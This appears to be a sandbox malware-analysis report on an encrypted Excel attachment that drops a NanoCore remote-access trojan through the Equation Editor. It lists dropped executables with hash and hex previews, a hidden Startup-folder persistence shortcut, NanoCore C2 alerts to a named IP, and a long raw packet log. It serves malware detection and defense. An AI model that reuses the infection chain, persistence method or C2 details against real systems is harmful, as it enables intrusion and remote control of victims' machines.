                                  SHA-512:518991B68496B3F8545E418CF9B345E0791E09CC20D177B8AA47E0ABA447AA55383C64F5BDACA39F2B061A5D08C16F2AD484AF8A9F238CA23AB081618FBA3AD3
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 14%, Browse
                                  • Antivirus: ReversingLabs, Detection: 11%
                                  Reputation:unknown
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y ................P..&...........D... ........@.. ....................................`..................................D..W....`..............................hD............................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................D......H.......l....%......)....................................................0..6.......(8...t....&.(8...t....&......(8...t...................8;....8%.....(8...t....&.(8...t............:.....(8...t....:.....(8...t....:....(8...t....................................\:@....(8...t....&.)...&8.....(8...t....&(8...t....&.....:.......8x........:L...88....(8...t....&(8...t....&(8...t....&(8...t.....................:....8!.....(8...t....&......(8...t....&.....(8...t....:8.....(8...t....&.
                                  C:\Users\user\AppData\Local\Temp\sys30s.txt
                                  Process:C:\Users\user\AppData\Local\Temp\sys30s.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):61
                                  Entropy (8bit):4.780232264327083
                                  Encrypted:false
                                  SSDEEP:3:S7ovIXp4E2J5WcKHpWVkJv:S7oQP23WcKHpBv
                                  MD5:048C93039215AAD06E6156149E44C4A0
                                  SHA1:E176C7B09B521EE34DB52FADCB6B7C4F3E22F32A
                                  SHA-256:0E3A14D7B7309BA366364A3FE0DB2C99AE3ADB937A1E50EBD2FCFD5E1A286D89
                                  SHA-512:8FEA2BC15C1E7D2742AB572AE15F2F1D5B4F7740F362E78D86B668DA769EA63E8D01B789C2CB495178F10341AD6BF33CDABA03316C8CC7922631A01E0F61BFF8
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: 3048..C:\Users\user\AppData\Local\sys4h57g\sys30.exe..2612..
                                  C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  Process:C:\Users\Public\vbc.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):667136
                                  Entropy (8bit):6.722731568770937
                                  Encrypted:false
                                  SSDEEP:6144:4kS8lJbCW4cCUDgd35ZFj6uf3wwoBd78yRp+7tjbSaFSZYFFhJk5XkbQEPr3jbDM:J9bB41pZFmw3wwo733gtSsSZCfOkm3l
                                  MD5:4C658DB84A58CE7EC0C2F2EB9F14C97C
                                  SHA1:CE119BDEE8F67E1AEF1E45DA57C0BF2E858D3826
                                  SHA-256:3BEE3F04F56446103684FC76026CFAA5AB39CF206489B2E7C9142EAD5A68C738
                                  SHA-512:08F212F8745A077BC3F0F839A1D7BC008D87D65072D3A2B91C8EE7764C00F25D594D0972CB32EA26931FE3FE9BA205814A45C5B83BA661972A84D54824569B5A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:unknown
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`...................$...........C... ........@.. ....................................`..................................C..K....`............................................................................... ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................C......H............V......G....y...k........................................... .........%.d...(.....e... .........%.f...(.....g...*..(....*&..(.....*.s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o......,.r...p......(....s....z..+..s..........~.........(.....o......(..
                                  C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                  Process:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2552
                                  Entropy (8bit):7.024371743172393
                                  Encrypted:false
                                  SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrw0:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCe
                                  MD5:881D2F4B245BF6C5FC7A6CA720D59D5E
                                  SHA1:4BFC165F42F888943ED858A289D0B7368986AA8A
                                  SHA-256:79655C30BBE54988E098C7759D7614CB980AAAB2FBB60E7F8937CA8F9C95420F
                                  SHA-512:22E6D650E1DD3730D7B126B80E262788E0FDDFAA2E1C12B599DC85FB3C23D143A6D5F94D048EBE4BA05382BE2E8C85D996BAC3791E1F4F4808771D29ACC25110
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                                  C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                  Process:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):8
                                  Entropy (8bit):3.0
                                  Encrypted:false
                                  SSDEEP:3:PhSn:I
                                  MD5:DD0A8CB117CFA0CA68879D97851EEEF8
                                  SHA1:4A7CA94C927C6948C0E0B7940E89EBE8A9E90652
                                  SHA-256:951EF69376D55EFF9C49CA7D171A5089A00B87587BB344BBE01207C9D16E27D6
                                  SHA-512:6053E383D6E914863A662BEE07206AEF0329275327705B4D06F49F267980484416C0A0A3AFDDA42A2322CE8D1C940788F3D83433387D9C68BC20D7AD7E145BF0
                                  Malicious:true
                                  Reputation:unknown
                                  Preview: u....x.H
                                  C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bak
                                  Process:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):24
                                  Entropy (8bit):4.501629167387823
                                  Encrypted:false
                                  SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                  MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                  SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                  SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                  SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: 9iH...}Z.4..f..J".C;"a
                                  C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bin
                                  Process:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):5.320159765557392
                                  Encrypted:false
                                  SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                  MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                  SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                  SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                  SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                                  C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat
                                  Process:C:\Users\user\AppData\Local\sys4h57g\sys30.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):327432
                                  Entropy (8bit):7.99938831605763
                                  Encrypted:true
                                  SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                  MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                  SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                  SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                  SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk
                                  Process:C:\Users\Public\vbc.exe
                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                  Category:dropped
                                  Size (bytes):988
                                  Entropy (8bit):3.117289656218176
                                  Encrypted:false
                                  SSDEEP:12:8wl0QYTXCG7GyuRy/Cr5xES1/XTJ1Q1/XTrg//NJkKAB3YilMMEpxRljK:8/SUqRywESxJqxr4VHAx3q
                                  MD5:D7B7957225A72E5785C16723D3DEBDB5
                                  SHA1:5ABC0ED3081D57EC645BF78A8194A919420E036C
                                  SHA-256:67403FD711E36C1249752358C2C485BCDE940CDD08ACB1E0569904076A1C7603
                                  SHA-512:DE55CF5586EF677F5B71D6CB5F1D835CEA8892DE3B5FC2E43EBE0DB66A348B8D4E86338DBD71134EC01E0F58E79BE6AEF604382585253472507AA2E64943AB51
                                  Malicious:false
                                  Reputation:unknown
                                  Preview: L..................F.............................................................P.O. .:i.....+00.../C:\...................L.1...........Users.8..............*.........................U.s.e.r.s.....L.1...........user.8..............*.........................A.l.b.u.s.....R.1...........AppData.<..............*.........................A.p.p.D.a.t.a.....L.1...........Local.8..............*.........................L.o.c.a.l.....V.1...........sys4h57g..>..............*.........................s.y.s.4.h.5.7.g.....X.2...........sys30.exe.@..............*.........................s.y.s.3.0...e.x.e.......*.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.s.y.s.4.h.5.7.g.\.s.y.s.3.0...e.x.e./.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.y.s.4.h.5.7.g.\.s.y.s.3.0...e.x.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.................
                                  C:\Users\user\Desktop\~$Enclosed.xlsx
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):1.4377382811115937
                                  Encrypted:false
                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                  Malicious:true
                                  Reputation:unknown
                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  C:\Users\Public\vbc.exe
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):667136
                                  Entropy (8bit):6.722731568770937
                                  Encrypted:false
                                  SSDEEP:6144:4kS8lJbCW4cCUDgd35ZFj6uf3wwoBd78yRp+7tjbSaFSZYFFhJk5XkbQEPr3jbDM:J9bB41pZFmw3wwo733gtSsSZCfOkm3l
                                  MD5:4C658DB84A58CE7EC0C2F2EB9F14C97C
                                  SHA1:CE119BDEE8F67E1AEF1E45DA57C0BF2E858D3826
                                  SHA-256:3BEE3F04F56446103684FC76026CFAA5AB39CF206489B2E7C9142EAD5A68C738
                                  SHA-512:08F212F8745A077BC3F0F839A1D7BC008D87D65072D3A2B91C8EE7764C00F25D594D0972CB32EA26931FE3FE9BA205814A45C5B83BA661972A84D54824569B5A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:unknown
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`...................$...........C... ........@.. ....................................`..................................C..K....`............................................................................... ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................C......H............V......G....y...k........................................... .........%.d...(.....e... .........%.f...(.....g...*..(....*&..(.....*.s.........s.........s.........s.........s.........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.................,.........o....+....9....~.........,2~.........(....o......,.r...p......(....s....z..+..s..........~.........(.....o......(..

                                  Static File Info

                                  General

                                  File type:CDFV2 Encrypted
                                  Entropy (8bit):7.988625235153552
                                  TrID:
                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                  File name:Enclosed.xlsx
                                  File size:601496
                                  MD5:307b2db43e9e3b04e429cdd9d7df08ad
                                  SHA1:58a8d2e79a4984c457f779c34e6a3147a2a66d3f
                                  SHA256:d902487a332eb4be203d196abe75aa72b2fed223df29fb3112aa27e5b54109df
                                  SHA512:86c6a6797e9d23af9a72c3835b7895d7babe5da1fdce65c506fac585fd531379f5ed4125357596c7c783b0ad6248c025aa8e81deb47c5a004895d473093b9d74
                                  SSDEEP:12288:KZ/gyy4Or+YnEII0sTM33HSYU+mHXrQHBdOUDo:Kpy4S+VI3sYnHSYi7QhjDo
                                  File Content Preview:........................>.......................................................................................z..............................................................................................................................................

                                  File Icon

                                  Icon Hash:e4e2aa8aa4b4bcb4

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  09/14/21-21:48:50.478485TCP2025019ET TROJAN Possible NanoCore C2 60B491725230192.168.2.22194.5.98.103
                                  09/14/21-21:48:56.550213TCP2025019ET TROJAN Possible NanoCore C2 60B491735230192.168.2.22194.5.98.103
                                  09/14/21-21:49:02.850724TCP2025019ET TROJAN Possible NanoCore C2 60B491745230192.168.2.22194.5.98.103
                                  09/14/21-21:49:08.900282TCP2025019ET TROJAN Possible NanoCore C2 60B491755230192.168.2.22194.5.98.103
                                  09/14/21-21:49:15.056944TCP2025019ET TROJAN Possible NanoCore C2 60B491765230192.168.2.22194.5.98.103
                                  09/14/21-21:49:21.148652TCP2025019ET TROJAN Possible NanoCore C2 60B491775230192.168.2.22194.5.98.103
                                  09/14/21-21:49:27.191213TCP2025019ET TROJAN Possible NanoCore C2 60B491785230192.168.2.22194.5.98.103
                                  09/14/21-21:49:34.238295TCP2025019ET TROJAN Possible NanoCore C2 60B491795230192.168.2.22194.5.98.103
                                  09/14/21-21:49:40.450342TCP2025019ET TROJAN Possible NanoCore C2 60B491805230192.168.2.22194.5.98.103
                                  09/14/21-21:49:46.092651TCP2025019ET TROJAN Possible NanoCore C2 60B491815230192.168.2.22194.5.98.103
                                  09/14/21-21:49:52.361831TCP2025019ET TROJAN Possible NanoCore C2 60B491825230192.168.2.22194.5.98.103
                                  09/14/21-21:49:58.039325TCP2025019ET TROJAN Possible NanoCore C2 60B491835230192.168.2.22194.5.98.103

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 14, 2021 21:48:12.573790073 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:12.846668005 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:12.846760988 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:12.847129107 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.120636940 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.122325897 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.122363091 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.122459888 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.122469902 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.122543097 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.122668028 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.395565033 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.395600080 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.395653009 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.395703077 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.396718025 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.396785975 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.396789074 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.396832943 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.396873951 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.396909952 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.396964073 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.396970034 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.396991014 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.396996021 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.397000074 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.397018909 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.668407917 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.668442965 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.668456078 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.668468952 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.668731928 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.669738054 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669771910 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669797897 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669817924 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669835091 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669851065 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669863939 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669883966 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.669884920 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669900894 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669907093 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.669915915 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.669922113 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669938087 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669960976 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.669975042 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.670023918 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.670049906 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.672097921 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.941517115 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.941545010 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.941561937 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.941585064 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.941600084 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.941615105 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.941629887 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.941649914 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.941735983 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.941777945 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.942696095 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942727089 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942749023 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942768097 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942790031 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942792892 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.942810059 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942831993 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942853928 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942873001 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942895889 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942914963 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942936897 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942960024 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942981958 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.942982912 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943005085 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943027020 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943027973 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943048954 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943052053 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943075895 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943070889 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943095922 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943100929 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943120003 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943123102 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943135977 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943139076 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943141937 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943144083 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943145037 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943146944 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943170071 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943192959 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943212986 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943214893 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943238974 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:13.943238974 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943259001 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943272114 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.943275928 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:13.944407940 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:14.214364052 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214405060 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214432001 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214453936 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214476109 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214498997 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214523077 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214549065 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214570999 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214596033 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214621067 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:14.214624882 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214644909 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214647055 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:14.214651108 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:14.214665890 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214687109 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214706898 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214728117 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.214752913 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:14.214761019 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:14.214827061 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:14.216279030 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.216316938 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.216342926 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.216367006 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.216391087 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.216427088 CEST804916513.238.159.178192.168.2.22
                                  Sep 14, 2021 21:48:14.216437101 CEST4916580192.168.2.2213.238.159.178
                                  Sep 14, 2021 21:48:14.216451883 CEST804916513.238.159.178192.168.2.22
